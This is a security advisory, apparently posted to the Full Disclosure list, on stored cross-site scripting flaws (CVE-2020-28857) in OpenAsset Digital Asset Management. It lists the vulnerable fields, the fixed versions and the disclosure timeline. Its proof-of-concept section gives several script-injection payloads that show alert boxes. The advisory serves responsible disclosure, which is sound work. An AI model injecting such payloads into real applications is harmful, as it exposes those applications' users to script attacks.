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[FD] Stored cross-site scripting (XSS) in OpenAsset Digital Asset Management 11.2.1/12.0.19 disclosure

Title: Stored cross-site scripting (XSS)


Product: OpenAsset Digital Asset Management by OpenAsset


Vendor Homepage: https://www.openasset.com/


Vulnerable Version: 12.0.19 (Cloud) 11.2.1 (On-premise)


Fixed Version: 12.0.23 (Cloud) 11.4.10 (On-premise)


CVE Number: CVE-2020-28857


Author: Jack Misiura from The Missing Link 


Website: https://www.themissinglink.com.au




2020-11-14 Disclosed to Vendor

2020-12-04 Vendor releases final patches

2020-12-10 Publication


1. Vulnerability Description


The OpenAsset Digital Asset Management web application allowed for stored 
cross-site scripting attacks against various parameters and endpoints. 
Vulnerable parts of the web application include:


* System Preferences

              * Project Code regex field

              * User name regex field

              * Password regex field

              * All three description fields

              * First Album Name field

              * Visit Items Per SOAP request field

* Categories description

* Keywords, triggered on deletion attempts

* Editing photographer name

* Access token name

* Web share name


2. PoC


For system preferences fields, the following payloads can be used:


" autofocus onfocus="alert('Stored XSS');" abc="

"><script>alert("Script stored XSS");</script>


For categories description:


Category Name Goes Here<script>alert('Description stored XSS');</script>


For keywords:


Delete Me<script>alert(1234);</script>


Photographer name:


John Smith<script>alert("XSS Attack!");</script>


Access token name:


TokenName"><script>alert("Stored XSS Tokens")</script>


Web share name:


Share<script>alert("Stored XSS Web Share Name");</script>


3. Solution


The vendor provides an updated version (11.4.10) which should be installed 
immediately. If using the cloud version, the vendor has already updated it.


4. Advisory URL




Jack Misiura​

Application Security Consultant


9‑11 Dickson Avenue





1300 865 865


+61 2 8436 8585


 <https://www.themissinglink.com.au/> themissinglink.com.au









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Description: S/MIME cryptographic signature

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